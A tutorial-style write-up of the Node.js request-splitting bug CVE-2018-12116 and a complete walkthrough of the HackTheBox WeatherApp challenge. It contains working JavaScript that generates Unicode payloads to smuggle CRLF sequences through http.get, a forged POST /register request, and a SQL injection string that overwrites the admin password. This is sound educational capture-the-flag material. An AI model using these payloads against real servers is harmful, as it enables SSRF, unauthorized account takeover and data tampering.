Node request splitting vulnerability

Before versions 6.15.0 and 8.14.0, node corrupted non-latin1 characters in the request path handled by its http module. Because of this bug, someone writing http.get("http://some.example/route/Ŕ") was actually sending a request to http://some.example/route/T. Apart from being unexpected, this behavior led to the discovery of CVE-2018-12116. With this vulnerability, it was possible to bypass the filtering done by node’s http module, inject HTTP control characters and therefore perform several HTTP requests in a single call to http.get().

It means that a server executing http.get(`http://${userDefinedVariable}`) would allow the user to send arbitrary requests to any server, including POST, PUT or DELETE requests.
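The character corruption described above can be reproduced without any network access. The snippet below is a minimal sketch that uses Buffer's latin1 encoding to show the truncation; it illustrates the effect and is not the code path of node's http module itself.

```javascript
// Encoding a JavaScript string as latin1 keeps only the low byte of each
// UTF-16 code unit, so characters above U+00FF are silently truncated.
const original = '\u0154'; // "Ŕ", LATIN CAPITAL LETTER R WITH ACUTE
const truncated = Buffer.from(original, 'latin1');

console.log(original.charCodeAt(0).toString(16)); // 154
console.log(truncated);                            // <Buffer 54>
console.log(truncated.toString('latin1'));         // T
```

The high byte (0x01) is dropped and only 0x54, the code of "T", remains.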

The WeatherApp challenge from HackTheBox is a good example of this vulnerability.

Disclaimer: this post contains a complete walkthrough of all steps of this HackTheBox challenge.


Node’s http.get function and HTTP specification

The magic behind http.get(someURL) is that node transforms the URL into a valid HTTP request. When the URL is parsed by node, it becomes an HTTP request object, which is then converted to a sequence of bytes that complies with the HTTP specification.

[Figure: on the sender side, node converts the HTTP request object to bytes and writes them to a TCP socket; the bytes are sent through the internet; on the receiver side, the bytes are read from a TCP socket, converted back to an HTTP request object and handed to the receiver application.]
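To make the URL-to-bytes conversion more concrete, here is a simplified sketch. The helper buildGetRequest is hypothetical and only mimics the general idea; node's real implementation handles many more cases (other headers, ports, keep-alive and so on).

```javascript
const { URL } = require('url');

// Hypothetical helper: a simplified picture of what an HTTP client does
// when it turns a URL into the text of a GET request.
function buildGetRequest(urlString) {
  const url = new URL(urlString);
  return [
    `GET ${url.pathname}${url.search} HTTP/1.1`,
    `Host: ${url.host}`,
    'Content-Length: 0',
    '', // the two empty items produce the final \r\n\r\n
    ''
  ].join('\r\n');
}

const raw = buildGetRequest('http://some.example/route/myroute');
console.log(JSON.stringify(raw));
// "GET /route/myroute HTTP/1.1\r\nHost: some.example\r\nContent-Length: 0\r\n\r\n"
```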

During this process, node cannot just split the URL into 3 parts (scheme, host and route), because each of these parts may contain HTTP control characters. These characters have a meaning in the HTTP specification: for example, the two bytes \r\n separate the headers of a single HTTP request, and \r\n\r\n separates the headers from the body of the request. A valid HTTP request looks like the following:

GET /route/myroute HTTP/1.1
Host: some.example
Content-Length: 0

It has exactly one \r\n between each header and no \r\n\r\n inside the headers. It is therefore important for node to encode the characters \r and \n (and other control characters) if they appear in the URL. Otherwise, a URL like https://some.example/route/\r\n\r\nmyroute would be converted to the sequence of bytes below, which is not a valid HTTP request.

GET /route/

myroute HTTP/1.1
Host: some.example
Content-Length: 0

For the converted sequence of bytes to be valid, https://some.example/route/\r\n\r\nmyroute has to be percent-encoded, as in the HTTP request below.

GET /route/%0D%0A%0D%0Amyroute HTTP/1.1
Host: some.example
Content-Length: 0
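Percent-encoding can be tried out with the standard encodeURI function. This is only an illustration of the encoding itself; I am not claiming it is the function node calls internally. Control characters become %XX escapes of their byte value, while characters outside ASCII are escaped from their UTF-8 bytes.

```javascript
// \r is byte 0x0D and \n is byte 0x0A
const escapedControl = encodeURI('/route/\r\n\r\nmyroute');
console.log(escapedControl); // /route/%0D%0A%0D%0Amyroute

// U+010D and U+010A are two-byte UTF-8 characters (c4 8d and c4 8a)
const escapedUnicode = encodeURI('/route/\u010D\u010A');
console.log(escapedUnicode); // /route/%C4%8D%C4%8A
```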

Suppose we have a sequence of bytes: what separates one HTTP request from the next? The headers of a request end with \r\n\r\n and are followed by the body, whose size is given by Content-Length, so the next request starts right after the body. This is why sending the following sequence of bytes to a TCP socket triggers two HTTP requests. From here on, if we are able to inject control characters, we are able to trick node’s http module into building a sequence of bytes that will be understood as two HTTP requests. This technique is called request splitting.

GET /route/legitimate HTTP/1.1
Host: some.example
Content-Length: 0

GET /evil/request HTTP/1.1
Host: some.example
Content-Length: 0
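The way a receiver finds request boundaries can be sketched with a deliberately naive parser. The function countRequests is hypothetical: it works on a string rather than on bytes, ignores chunked encoding and assumes well-formed input, which is enough to show why the bytes above count as two requests.

```javascript
// Naive sketch: read each header block up to the blank line (\r\n\r\n),
// then skip Content-Length characters of body, and repeat.
function countRequests(raw) {
  let count = 0;
  let offset = 0;
  while (offset < raw.length) {
    const headerEnd = raw.indexOf('\r\n\r\n', offset);
    if (headerEnd === -1) break; // incomplete header block
    const head = raw.slice(offset, headerEnd);
    const match = /^content-length:\s*(\d+)/im.exec(head);
    const bodyLength = match ? Number(match[1]) : 0;
    offset = headerEnd + 4 + bodyLength;
    count++;
  }
  return count;
}

const stream =
  'GET /route/legitimate HTTP/1.1\r\nHost: some.example\r\nContent-Length: 0\r\n\r\n' +
  'GET /evil/request HTTP/1.1\r\nHost: some.example\r\nContent-Length: 0\r\n\r\n';

console.log(countRequests(stream)); // 2
```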

Character encoding

Character encoding is not a trivial topic, so let’s go over a few notions that are needed to understand the bug.

UTF-8 encoding and unicode character set

Unicode (or Universal Coded Character Set) is a character set that defines 1 112 064 valid code points (= different characters). Network protocols usually rely on UTF-8, a standard character encoding for Unicode. UTF-8 uses 8-bit (= 1 byte) code units and is a variable-length encoding: it uses 1 to 4 bytes to encode a single code point.

UTF-8 was designed to be backward compatible with ASCII and therefore uses the same byte values to encode ASCII characters (ASCII has 128 characters and is both a character set and an encoding format).

Code points that are used more often are encoded with fewer bytes (think of ASCII characters), so UTF-8-encoded texts are not that big.
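The variable length of UTF-8 is easy to observe with Buffer.byteLength. The sample characters below are arbitrary choices of mine, one for each possible length.

```javascript
// One sample character per UTF-8 length: A, é, € and an emoji
const samples = ['A', '\u00e9', '\u20ac', '\u{1F600}'];
const lengths = samples.map((ch) => Buffer.byteLength(ch, 'utf8'));

samples.forEach((ch, i) => console.log(ch, lengths[i]));
// A 1
// é 2
// € 3
// 😀 4
```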

ISO-8859-1 encoding and latin1 character set

ISO/IEC 8859 is a series of standards that define 8-bit character encodings. ISO-8859-1 (or ISO/IEC 8859-1) encodes the latin1 character set, also known as “Latin alphabet no. 1”. latin1 is a set of 191 characters from the Latin script.

ISO-8859-1 has several characteristics:

  • it is based on ASCII, meaning that the first 128 code points are encoded with the same values
  • it is a fixed-length encoding with an 8-bit code unit, meaning every code point is encoded as a single byte

latin1 is also a registered alias of ISO-8859-1, so I’ll use the name latin1 for the encoding in the rest of this page.

According to the original HTTP/1.1 specification (RFC 2616), it is the default character set of documents delivered via HTTP with a MIME type beginning with “text/”.

The 256 code points of latin1 are identical to the first 256 code points of Unicode, but UTF-8 and ISO-8859-1 do not encode them with the same bytes (this is the case for every code point outside the ASCII range). This means that a latin1 text can be represented as a Unicode text, but not with the same byte sequence.
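Here is a quick check of this difference, using the character é (U+00E9) as an arbitrary example of a code point that is in latin1 but outside ASCII.

```javascript
const eAcute = '\u00e9'; // é

const asLatin1 = Buffer.from(eAcute, 'latin1');
const asUtf8 = Buffer.from(eAcute, 'utf8');

console.log(asLatin1); // <Buffer e9>
console.log(asUtf8);   // <Buffer c3 a9>

// The latin1 byte alone is not valid UTF-8, so decoding it as UTF-8
// yields the replacement character U+FFFD instead of é.
console.log(asLatin1.toString('utf8') === '\ufffd'); // true
```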


Controlling the output

The first method to control what will be printed to the wire is to emulate the behavior of node.

Let’s start by creating functions that will emulate what node will output to the wire.

function emulateDecodeReceivedInput(byteList) {
  return Buffer.from(byteList).toString('UTF-8')
}

function emulateEncodeString(utf8string) {
  // utf8string is a standard JavaScript string. Encoding it as latin1
  // cannot represent every Unicode character: characters above U+00FF
  // are truncated to a single byte. This is exactly the behavior we
  // want to emulate.
  return Buffer.from(utf8string, 'latin1')
}

Since we need to understand what is written to the wire, we also need a function that prints a list of bytes the way it will be understood by the node server (UTF-8-decoded):

function printByteList(byteList) {
  console.log(Buffer.from(byteList).toString('UTF-8'));
}

We know that UTF-8 represents a character with 1 to 4 bytes, whereas latin1 always uses 1 byte. Since node decodes the received input as UTF-8 and then writes the resulting string to the wire as latin1, some two-byte sequences will be transformed into other bytes. We can therefore iterate over all possible two-byte sequences to find out how they will be understood and transformed by node.

function printInternalStringAndTransformedString(byteList) {
  printByteList(byteList)
  printByteList(emulateEncodeString(emulateDecodeReceivedInput(byteList)))
}

Let’s choose one valid UTF-8 printable character from its character table. I chose the U+0148 latin letter, which is represented by the hex numbers c5 88.

printInternalStringAndTransformedString([197, 136]);
// Output
// ň
// H

We assume that for any latin1 text, we can compute a text composed of two-byte UTF-8 characters that node will transform into that latin1 text. To compute this Unicode text, we take each character of the latin1 text and look up a valid two-byte UTF-8 character that maps to it.

function getLatin1toUnicodeMap() {
  // latin1toUnicodeMap is built so that latin1toUnicodeMap[wantedCharacter] is a list
  // of unicode Strings we have to send to the node server to create the wanted output
  const latin1toUnicodeMap = {};
  for (let a = 0; a < 256; a++) {
    for (let b = 0; b < 256; b++) {
      const sourceBytes = [a, b];
      const utf8string = emulateDecodeReceivedInput(sourceBytes);
      const outputtedBytes = emulateEncodeString(utf8string);
      const stringOfBytesSentToWire = emulateDecodeReceivedInput(outputtedBytes);

      if (!latin1toUnicodeMap[stringOfBytesSentToWire]) {
        latin1toUnicodeMap[stringOfBytesSentToWire] = [];
      }
      latin1toUnicodeMap[stringOfBytesSentToWire].push(utf8string);
    }
  }
  return latin1toUnicodeMap
}

function computeText(latin1text, latin1toUnicodeMap) {
  let unicodeText = "";
  for (let i = 0; i < latin1text.length; i++) {
    const latin1character = latin1text[i];
    if (latin1toUnicodeMap[latin1character]) {
      // Let's take the first character of the list
      unicodeText += latin1toUnicodeMap[latin1character][0];
    } else {
      console.log("ERROR, no unicode character for this latin1 character:", latin1character);
    }
  }
  return unicodeText;
}

We just have to write the last part of the script:

const latin1toUnicodeMap = getLatin1toUnicodeMap();
const latin1text = "Try to compute this latin1 text composed of printable\nand unprintable characters";
const unicodeText = computeText(latin1text, latin1toUnicodeMap);
console.log(unicodeText);
// Output:
// ŔŲŹĠŴůĠţůŭŰŵŴťĠŴŨũųĠŬšŴũŮıĠŴťŸŴĠţůŭŰůųťŤĠůŦĠŰŲũŮŴšŢŬťĊšŮŤĠŵŮŰŲũŮŴšŢŬťĠţŨšŲšţŴťŲų

// Verification
printByteList(emulateEncodeString(unicodeText));
// Output:
// Try to compute this latin1 text composed of printable
// and unprintable characters

Note that the method will work for both printable and unprintable latin1 characters.
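As a side note, the lookup table is not strictly necessary. Because the latin1 encoding keeps only the low byte of each character code, adding 0x100 to the code of each wanted character gives a character that truncates back to it. The function computeTextByOffset below is a hypothetical shortcut of mine, not part of the original script.

```javascript
// Shift every character by 0x100: U+0054 "T" becomes U+0154, and so on.
// The latin1 truncation then drops the high byte and restores the input.
function computeTextByOffset(text) {
  let result = '';
  for (let i = 0; i < text.length; i++) {
    const code = text.charCodeAt(i);
    if (code > 0xff) {
      throw new RangeError(`Not a single-byte character at index ${i}`);
    }
    result += String.fromCharCode(0x100 + code);
  }
  return result;
}

const crafted = computeTextByOffset('Try\n');
console.log(crafted === '\u0154\u0172\u0179\u010a'); // true ("ŔŲŹĊ")

// Verification: the latin1 truncation gives the wanted text back
console.log(Buffer.from(crafted, 'latin1').toString('latin1') === 'Try\n'); // true
```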


Solving the HackTheBox WeatherApp challenge

Analysis of source code

Let’s look a bit at the source code of the application.

WeatherApp
├── database.js
├── flag
├── helpers
│   ├── HttpHelper.js
│   └── WeatherHelper.js
├── index.js
├── package.json
├── package-lock.json
├── routes
│   └── index.js
├── static
│   ├── css
│   │   └── main.css
│   ├── favicon.gif
│   ├── host-unreachable.jpg
│   ├── js
│   │   ├── koulis.js
│   │   └── main.js
│   ├── koulis.gif
│   └── weather.gif
└── views
    ├── index.html
    ├── login.html
    └── register.html

The first thing to notice is that the package.json file has a nodeVersion: v8.12.0 key, and this version of node is vulnerable to CVE-2018-12116. Looking into /routes/index.js shows all API routes and their code:

  • GET /: sending the static views/index.html file
  • GET /register: sending the static views/register.html file
  • POST /register: expecting username and password in a JSON object in the body, but only accessible from 127.0.0.1 because of the req.socket.remoteAddress.replace(/^.*:/, '') != '127.0.0.1' check
  • GET /login: sending the static views/login.html file
  • POST /login: expecting username and password in a JSON object in the body, checks that the username and password exist in the database, checks that the username is admin and then sends the flag. It throws an error if any of the checks fails
  • POST /api/weather: expecting endpoint, city and country in a JSON object in the body and sending a request with http.get

First of all, adding an X-Forwarded-For header does not help to bypass the 127.0.0.1 check here, because the check uses the socket’s remote address, not a sender address found in the request.
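The behavior of that check can be reproduced in isolation. The function name isLocalSocket and the sample addresses are mine; only the replace(/^.*:/, '') expression comes from the challenge code.

```javascript
// Same expression as in the route: strip everything up to the last colon,
// which turns an IPv4-mapped IPv6 address into a plain IPv4 address.
function isLocalSocket(remoteAddress) {
  return remoteAddress.replace(/^.*:/, '') === '127.0.0.1';
}

console.log(isLocalSocket('::ffff:127.0.0.1')); // true
console.log(isLocalSocket('127.0.0.1'));        // true
console.log(isLocalSocket('::ffff:10.10.14.3')); // false
```

Since remoteAddress comes from the TCP connection and not from the request headers, the only way to pass the check is to have the request sent from the server itself.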

If we look closer at the POST /register route, the code that creates a user in the database is shown below and is vulnerable to SQL injection.

new Promise(async (resolve, reject) => {
  try {
    let query = `INSERT INTO users (username, password) VALUES ('${user}', '${pass}')`;
    resolve((await this.db.run(query)));
  } catch(e) {
    reject(e);
  }
});

We still can’t reach the POST /register endpoint directly, but since node is using a vulnerable http.get function, we can trick it into sending a POST request to 127.0.0.1/register, which bypasses the “127.0.0.1 check”. The http.get call made by the POST /api/weather route is the following:

let weatherData = await new Promise((resolve, reject) => {
  http.get(`http://${endpoint}/data/2.5/weather?q=${city},${country}&units=metric&appid=${apiKey}`, res => {
    let body = '';
    res.on('data', chunk => body += chunk);
    res.on('end', () => {
      try {
        resolve(JSON.parse(body));
      } catch(e) {
        resolve(false);
      }
    });
  }).on('error', reject);
});

If everything works as expected, we should be able to use the /api/weather route to trick node into sending the malicious SQL injection payload to the /register route. We have to:

  1. Create a payload that leverages the SQL injection to change the admin password
  2. Create a valid POST HTTP request that embeds the SQL injection payload
  3. Wrap this HTTP request and encode it using the computeText function
  4. Use this computed Unicode text in the endpoint parameter of the /api/weather route to trigger CVE-2018-12116
[Figure: Burp sends POST /api/weather containing non-latin1 characters to node; node then emits the crafted HTTP request POST /register, which carries the SQL injection payload to the database.]

SQL injection

Let’s start with the SQL injection, which is pretty easy. We want to make the server execute the query INSERT INTO users (username, password) VALUES ('admin', '') ON CONFLICT (username) DO UPDATE SET password='1234' to overwrite the admin’s password. The password field should therefore contain ') ON CONFLICT (username) DO UPDATE SET password='1234';--.
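To check the payload, we can rebuild the query string the same way the vulnerable code does, without touching any database.

```javascript
// Same template as in the challenge's register code
const user = 'admin';
const pass = "') ON CONFLICT (username) DO UPDATE SET password='1234';--";

const query = `INSERT INTO users (username, password) VALUES ('${user}', '${pass}')`;
console.log(query);
// INSERT INTO users (username, password) VALUES ('admin', '') ON CONFLICT (username) DO UPDATE SET password='1234';--')
```

The trailing ') left over from the template ends up after the -- comment marker, so it is ignored by the database.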

The HTTP request should then be as below.

const sqlInjectionPayload = "') ON CONFLICT (username) DO UPDATE SET password='1234';--";
const body = `username=admin&password=${encodeURIComponent(sqlInjectionPayload)}`
const registerHTTPrequest = `POST /register HTTP/1.1\r
Host: 127.0.0.1\r
Connection: close\r
Content-Type: application/x-www-form-urlencoded\r
Content-Length: ${body.length}\r
\r
${body}\r
\r
`;

I validated the above request by running the WeatherApp code locally and sending the request with Burp Repeater.
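Two properties of the body can also be checked offline. This sketch assumes the server decodes form bodies in the standard way, which URLSearchParams emulates here; the variable names other than sqlInjectionPayload and body are mine.

```javascript
const sqlInjectionPayload = "') ON CONFLICT (username) DO UPDATE SET password='1234';--";
const body = `username=admin&password=${encodeURIComponent(sqlInjectionPayload)}`;

// 1. The payload survives the URL-encoding round trip unchanged
const decoded = new URLSearchParams(body);
console.log(decoded.get('username'));                         // admin
console.log(decoded.get('password') === sqlInjectionPayload); // true

// 2. The body is pure ASCII, so body.length equals its size in bytes and
//    can safely be used as the Content-Length value
console.log(Buffer.byteLength(body) === body.length);         // true
```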

SSRF using CVE-2018-12116

Remember that we wrote a computeText function to exploit CVE-2018-12116. We just have to use this function to make node perform the POST request on our behalf.

The payload we choose therefore contains the request we crafted earlier.

const cvePayload = ` HTTP/1.1\r
Host: 127.0.0.1\r
\r
${registerHTTPrequest}GET /index?`;

const latin1toUnicodeMap = getLatin1toUnicodeMap();
const maliciousEndpointPayload = "127.0.0.1/" + computeText(cvePayload, latin1toUnicodeMap);
console.log(maliciousEndpointPayload);

Using maliciousEndpointPayload as the value of the endpoint parameter in /api/weather will make node send the following sequence of HTTP requests.

GET / HTTP/1.1
Host: 127.0.0.1

POST /register HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

username=admin&password=sqliPayload

GET /index?%2Fdata%2F2.5%2Fweather%3Fq%3Dhere%2Cthere%26units%3Dmetric%26appid%3D1337
Host: 127.0.0.1
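The splitting can be emulated offline to see where the extra requests come from. This sketch does not call http.get: it only builds a request line the way a client would and applies the latin1 truncation with Buffer. The helper shiftAboveLatin1 and the shortened injected request are simplifications of mine.

```javascript
// Move each character above U+00FF so that the latin1 truncation restores it
function shiftAboveLatin1(text) {
  return Array.from(text, (c) => String.fromCharCode(0x100 + c.charCodeAt(0))).join('');
}

// Shortened version of the injected text (no headers or body for POST)
const injected =
  ' HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n' +
  'POST /register HTTP/1.1\r\n\r\n' +
  'GET /index?';

// The path as the client sees it: no raw control characters to filter
const path = '/' + shiftAboveLatin1(injected) + '/data/2.5/weather';
const hasRawControlChars = /[\r\n ]/.test(path);
console.log(hasRawControlChars); // false

// Emulate the vulnerable write: the request line is encoded as latin1
const requestLine = `GET ${path} HTTP/1.1\r\n`;
const wire = Buffer.from(requestLine, 'latin1').toString('latin1');

console.log(wire.split('\r\n')[0]);                    // GET / HTTP/1.1
console.log(wire.includes('POST /register HTTP/1.1')); // true
```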

Get the flag

We can then log in with the admin account and get the flag.


Sources and references

Blog post from Ryan F. Kelly

Github issue discussing the bug

Differences between ASCII, ISO-8859 and Unicode

Wikipedia page of ISO-8859

Wikipedia page of UTF-8

Understanding what a codepoint is